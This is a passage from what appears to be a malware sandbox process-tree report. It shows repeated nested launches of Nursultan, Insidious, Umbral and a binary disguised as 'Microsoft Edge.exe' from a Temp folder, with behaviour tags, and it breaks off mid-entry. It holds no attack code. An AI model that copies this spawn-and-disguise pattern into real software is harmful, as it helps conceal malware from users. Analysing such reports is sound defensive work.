        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        20⤵
        
        PID:2584
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        21⤵
        
        PID:2744
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        22⤵
        
        PID:2820
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        23⤵
        
        PID:2928
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        24⤵
        
        PID:1880
        
        C:\Windows\system32\cmd.exe
        
        cmd
        24⤵
        
        PID:2524
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        23⤵
        
        PID:1916
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        23⤵
        Delays execution with timeout.exe
        
        PID:540
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        23⤵
        
        PID:2624
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        22⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1820
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        22⤵
        
        PID:2400
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        22⤵
        
        PID:2280
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        21⤵
        
        PID:2964
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        22⤵
        
        PID:2256
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        23⤵
        
        PID:2976
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        24⤵
        
        PID:2028
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        25⤵
        
        PID:2608
        
        C:\Windows\system32\cmd.exe
        
        cmd
        25⤵
        
        PID:2876
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        24⤵
        
        PID:2216
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        24⤵
        Delays execution with timeout.exe
        
        PID:2636
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        24⤵
        
        PID:356
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        23⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1808
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        23⤵
        
        PID:948
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        23⤵
        
        PID:1792
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        22⤵
        
        PID:880
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        23⤵
        
        PID:2364
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        24⤵
        
        PID:2796
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        25⤵
        
        PID:2652
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        26⤵
        
        PID:2360
        
        C:\Windows\system32\cmd.exe
        
        cmd
        26⤵
        
        PID:2696
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        25⤵
        
        PID:2468
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        25⤵
        Delays execution with timeout.exe
        
        PID:2532
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        25⤵
        
        PID:344
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        24⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1972
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        24⤵
        
        PID:1796
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        24⤵
        
        PID:2828
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        23⤵
        
        PID:2176
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        24⤵
        
        PID:1308
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        25⤵
        
        PID:2824
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        26⤵
        
        PID:1844
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        27⤵
        
        PID:1444
        
        C:\Windows\system32\cmd.exe
        
        cmd
        27⤵
        
        PID:2324
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        26⤵
        
        PID:1896
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        26⤵
        Delays execution with timeout.exe
        
        PID:640
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        26⤵
        
        PID:2804
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        25⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1724
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        25⤵
        
        PID:2964
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        25⤵
        
        PID:2952
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        24⤵
        
        PID:2732
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        25⤵
        
        PID:2728
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        26⤵
        
        PID:1580
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        27⤵
        
        PID:1816
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        28⤵
        
        PID:2584
        
        C:\Windows\system32\cmd.exe
        
        cmd
        28⤵
        
        PID:2888
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        27⤵
        
        PID:324
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        27⤵
        Delays execution with timeout.exe
        
        PID:444
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        27⤵
        
        PID:1256
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        26⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:448
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        26⤵
        
        PID:1540
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        26⤵
        
        PID:2488
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        25⤵
        
        PID:1332
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        26⤵
        
        PID:2816
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        27⤵
        
        PID:2176
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        28⤵
        
        PID:1444
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        29⤵
        
        PID:1740
        
        C:\Windows\system32\cmd.exe
        
        cmd
        29⤵
        
        PID:2960
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        28⤵
        
        PID:2456
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        28⤵
        Delays execution with timeout.exe
        
        PID:892
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        28⤵
        
        PID:2996
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        27⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1132
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        27⤵
        
        PID:2132
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        27⤵
        
        PID:1372
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        26⤵
        
        PID:1520
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        27⤵
        
        PID:1504
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        28⤵
        
        PID:1720
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        29⤵
        
        PID:2528
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        30⤵
        
        PID:1536
        
        C:\Windows\system32\cmd.exe
        
        cmd
        30⤵
        
        PID:2584
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        29⤵
        
        PID:2044
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        29⤵
        Delays execution with timeout.exe
        
        PID:1636
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        29⤵
        
        PID:2256
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        28⤵
        
        PID:1744
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        28⤵
        
        PID:1900
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        28⤵
        
        PID:996
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        27⤵
        
        PID:2464
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        28⤵
        
        PID:2732
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        29⤵
        
        PID:2536
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        30⤵
        
        PID:1680
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        31⤵
        
        PID:1896
        
        C:\Windows\system32\cmd.exe
        
        cmd
        31⤵
        
        PID:540
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        30⤵
        
        PID:2752
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        30⤵
        Delays execution with timeout.exe
        
        PID:2188
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        30⤵
        
        PID:2788
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        29⤵
        
        PID:2644
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        29⤵
        
        PID:356
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        29⤵
        
        PID:2052
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        28⤵
        
        PID:2836
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        29⤵
        
        PID:1880
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        30⤵
        
        PID:540
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        31⤵
        
        PID:2256
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        32⤵
        
        PID:1540
        
        C:\Windows\system32\cmd.exe
        
        cmd
        32⤵
        
        PID:1576
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        31⤵
        
        PID:2676
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        31⤵
        Delays execution with timeout.exe
        
        PID:2028
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        31⤵
        
        PID:2892
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        30⤵
        
        PID:1680
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        30⤵
        
        PID:1676
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        30⤵
        
        PID:452
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        29⤵
        
        PID:2232
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        30⤵
        
        PID:696
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        31⤵
        
        PID:2888
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        32⤵
        
        PID:1764
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        33⤵
        
        PID:2828
        
        C:\Windows\system32\cmd.exe
        
        cmd
        33⤵
        
        PID:1132
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        32⤵
        
        PID:1896
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        32⤵
        Delays execution with timeout.exe
        
        PID:1848
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        32⤵
        
        PID:2644
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        31⤵
        Checks processor information in registry
        
        PID:1972
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        31⤵
        
        PID:1724
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        31⤵
        
        PID:1192
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        30⤵
        
        PID:2696
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        31⤵
        
        PID:712
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        32⤵
        
        PID:1796
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        33⤵
        
        PID:2240
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        34⤵
        
        PID:1052
        
        C:\Windows\system32\cmd.exe
        
        cmd
        34⤵
        
        PID:2188
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        33⤵
        
        PID:2356
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        33⤵
        Delays execution with timeout.exe
        
        PID:884
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        33⤵
        
        PID:2700
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        32⤵
        
        PID:1844
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        32⤵
        
        PID:324
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        32⤵
        
        PID:2168
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        31⤵
        
        PID:2996
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        32⤵
        
        PID:2876
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        33⤵
        
        PID:1320
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        34⤵
        
        PID:2732
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        35⤵
        
        PID:2256
        
        C:\Windows\system32\cmd.exe
        
        cmd
        35⤵
        
        PID:1792
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        34⤵
        
        PID:2104
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        34⤵
        Delays execution with timeout.exe
        
        PID:2832
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        34⤵
        
        PID:2212
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        33⤵
        
        PID:2196
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        33⤵
        
        PID:1060
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        33⤵
        
        PID:332
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        32⤵
        
        PID:2920
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        33⤵
        
        PID:344
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        34⤵
        
        PID:1836
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        35⤵
        
        PID:1628
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        36⤵
        
        PID:2404
        
        C:\Windows\system32\cmd.exe
        
        cmd
        36⤵
        
        PID:1724
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        35⤵
        
        PID:2496
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        35⤵
        Delays execution with timeout.exe
        
        PID:376
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        35⤵
        
        PID:1724
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        34⤵
        
        PID:2600
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        34⤵
        
        PID:3068
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        34⤵
        
        PID:1740
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        33⤵
        
        PID:2360
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        34⤵
        
        PID:1340
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        35⤵
        
        PID:1504
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        36⤵
        
        PID:2012
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        37⤵
        
        PID:884
        
        C:\Windows\system32\cmd.exe
        
        cmd
        37⤵
        
        PID:2700
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        36⤵
        
        PID:1052
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        36⤵
        Delays execution with timeout.exe
        
        PID:1040
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        36⤵
        
        PID:2264
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        35⤵
        
        PID:2572
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        35⤵
        
        PID:2636
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        35⤵
        
        PID:904
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        34⤵
        
        PID:2788
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        35⤵
        
        PID:692
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        36⤵
        
        PID:2428
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        37⤵
        
        PID:2744
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        38⤵
        
        PID:2752
        
        C:\Windows\system32\cmd.exe
        
        cmd
        38⤵
        
        PID:2732
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        37⤵
        
        PID:2572
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        37⤵
        Delays execution with timeout.exe
        
        PID:332
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        37⤵
        
        PID:1744
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        36⤵
        
        PID:2468
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        36⤵
        
        PID:2708
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        36⤵
        
        PID:1880
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        35⤵
        
        PID:2864
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        36⤵
        
        PID:2324
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        37⤵
        
        PID:2432
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        38⤵
        
        PID:1696
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        39⤵
        
        PID:952
        
        C:\Windows\system32\cmd.exe
        
        cmd
        39⤵
        
        PID:1636
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        38⤵
        
        PID:2968
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        38⤵
        Delays execution with timeout.exe
        
        PID:2656
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        38⤵
        
        PID:2684
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        37⤵
        
        PID:1756
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        37⤵
        
        PID:2168
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        37⤵
        
        PID:2600
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        36⤵
        
        PID:2828
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        37⤵
        
        PID:2012
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        38⤵
        
        PID:2644
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        39⤵
        
        PID:1916
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        40⤵
        
        PID:2524
        
        C:\Windows\system32\cmd.exe
        
        cmd
        40⤵
        
        PID:2504
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        39⤵
        
        PID:2392
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        39⤵
        
        PID:1332
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        39⤵
        
        PID:2928
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        38⤵
        
        PID:700
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        38⤵
        
        PID:1896
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        38⤵
        
        PID:2648
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        37⤵
        
        PID:1444
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        38⤵
        
        PID:2028
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        39⤵
        
        PID:3044
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        40⤵
        
        PID:924
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        41⤵
        
        PID:692
        
        C:\Windows\system32\cmd.exe
        
        cmd
        41⤵
        
        PID:1304
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        40⤵
        
        PID:2732
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        40⤵
        Delays execution with timeout.exe
        
        PID:2456
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        40⤵
        
        PID:692
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        39⤵
        
        PID:2600
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
